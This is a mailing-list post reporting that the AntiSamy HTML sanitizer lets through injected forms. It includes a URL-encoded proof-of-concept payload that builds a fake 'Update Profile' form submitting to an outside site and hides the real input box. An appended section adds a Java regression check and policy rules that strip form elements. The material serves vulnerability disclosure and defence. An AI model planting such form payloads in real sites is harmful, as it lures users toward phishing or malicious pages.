[Owasp-antisamy] Inserting forms to redirect to malicious locations

Michael Coates mwcoates at gmail.com
Fri Apr 18 13:49:37 EDT 2008


Arshan,

I found an area of antisamy that can be exploited.  It looks like the
trouble is that I can insert non-malicious html tags that interact with the
page itself.  So, while I can't get malicious javascript into your page, I
can create a nice looking form that redirects to somewhere that does have
malicious code.

Here is the link (it's safe):
http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=Please+update+me.+No+really%2C+put+something+in+and+hit+update.%0D%0A%3Ctable%3E%0D%0A%3Ctr%3E%3Ctd%3E%0D%0A%3Ctextarea+rows%3D%223%22+cols%3D%2240%22+name%3D%22profile%22%3E+%3C%2Ftextarea%3E%0D%0A%3C%2Ftd%3E%0D%0A%3Ctd+valign%3D%22top%22%3E%0D%0A%09%3Cform+id%3D%22michaelForm%22+method%3D%22GET%22+action%3D%22http%3A%2F%2Fgoogle.com%2Fsearch%22%3E%0D%0A%09%09%3Cselect+name%3D%22policy%22%3E%0D%0A%09%09%09%3Coption%3Eantisamy-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-slashdot-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-ebay-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-myspace-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%3C%2Fselect%3E%0D%0A%09%09%3Cinput+type%3D%22hidden%22+name%3D%22q%22+value%3D%22Hi+Arhsan%21%21+Where+should+we+redirect+today%3F%22+%2F%3E%0D%0A%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22Update+Profile%22%3E%0D%0A%3C%2Ftd%3E%0D%0A%0D%0A%09%3C%2Fform%3E%0D%0A%3C%2Ftable%3E%0D%0A%0D%0A%3Chr%3E%0D%0A%3Ctable+border%3D%220%22+cellpadding%3D%221000%22%3E%0D%0A%3Ctr%3E%3Ctd%3E%3C%2Ftd%3E%3C%2Ftr%3E%0D%0A%0D%0A%3C%2Ftable%3E%0D%0AI+couldn%27t+delete+the+actual+input+box%2C+so+I+just+hid+it+a+bit.+%3A%29&policy=antisamy-1.1.1.xml

Hey, looks like Google knows how to spell your name :)

Thanks,
Michael

-- 
Michael Coates
email: mwcoates at gmail.com

http://michaelcoates.wordpress.com
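The failure described in the mail is a sanitizer that keeps script out but still lets through markup that behaves as a form on the host page, so the visible "Update Profile" control submits to a site the application does not control. The following is an added example, not code from the original mail or from the AntiSamy project: a regression check that runs a sample of such markup through a deployed policy and reports any form-related elements that survive. The AntiSamy calls (Policy.getInstance, AntiSamy.scan, CleanResults.getCleanHTML) are the library's public API; the class and method names (FormStripCheck, leakedFormTags, policyStripsForms), the constructed sample input and the policy path taken from the command line are assumptions made for this example.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;
import org.owasp.validator.html.PolicyException;
import org.owasp.validator.html.ScanException;

/**
 * Added example (hypothetical class): checks that an AntiSamy policy removes
 * elements that would let sanitized content act as a form on the host page.
 */
public class FormStripCheck {

    // Constructed sample input modelled on the mail: no script, just a form
    // whose action points at a host the application does not own.
    static final String SAMPLE =
        "<table><tr><td>"
      + "<form id=\"f\" method=\"GET\" action=\"http://example.invalid/collect\">"
      + "<select name=\"policy\"><option>antisamy.xml</option></select>"
      + "<input type=\"hidden\" name=\"q\" value=\"x\" />"
      + "<input type=\"submit\" value=\"Update Profile\">"
      + "</form></td></tr></table>";

    // Elements that turn user-supplied content into an interactive form.
    static final List<String> FORM_TAGS =
        Arrays.asList("form", "input", "select", "option", "textarea", "button");

    // Matches an opening tag for any of the names above, case-insensitively.
    static final Pattern FORM_TAG_PATTERN = Pattern.compile(
        "<\\s*(" + String.join("|", FORM_TAGS) + ")\\b", Pattern.CASE_INSENSITIVE);

    /** Returns the form-related tag names still present in cleaned HTML. */
    static List<String> leakedFormTags(String cleanHtml) {
        List<String> leaked = new ArrayList<>();
        Matcher m = FORM_TAG_PATTERN.matcher(cleanHtml);
        while (m.find()) {
            String name = m.group(1).toLowerCase();
            if (!leaked.contains(name)) {
                leaked.add(name);
            }
        }
        return leaked;
    }

    /** True when the policy strips every form-related element from the input. */
    static boolean policyStripsForms(Policy policy, String input)
            throws ScanException, PolicyException {
        CleanResults cr = new AntiSamy().scan(input, policy);
        return leakedFormTags(cr.getCleanHTML()).isEmpty();
    }

    public static void main(String[] args) throws Exception {
        // args[0] is the path to the policy file under test (assumption).
        Policy policy = Policy.getInstance(args[0]);
        CleanResults cr = new AntiSamy().scan(SAMPLE, policy);
        List<String> leaked = leakedFormTags(cr.getCleanHTML());
        if (leaked.isEmpty()) {
            System.out.println("OK: policy removed all form elements");
        } else {
            System.out.println("FAIL: form elements survived sanitization: " + leaked);
            System.out.println("Cleaned output: " + cr.getCleanHTML());
            System.exit(1);
        }
    }
}
```

Run it against each policy the application ships (`java FormStripCheck antisamy-1.1.1.xml`, and likewise for the slashdot, ebay and myspace variants named in the mail). Where a policy fails the check, the fix is in the policy's tag-rules: an AntiSamy tag rule such as `<tag name="form" action="remove"/>` drops the element and its contents, and the same treatment for input, select, option, textarea and button closes the gap the mail demonstrates without touching the script-blocking rules that already work.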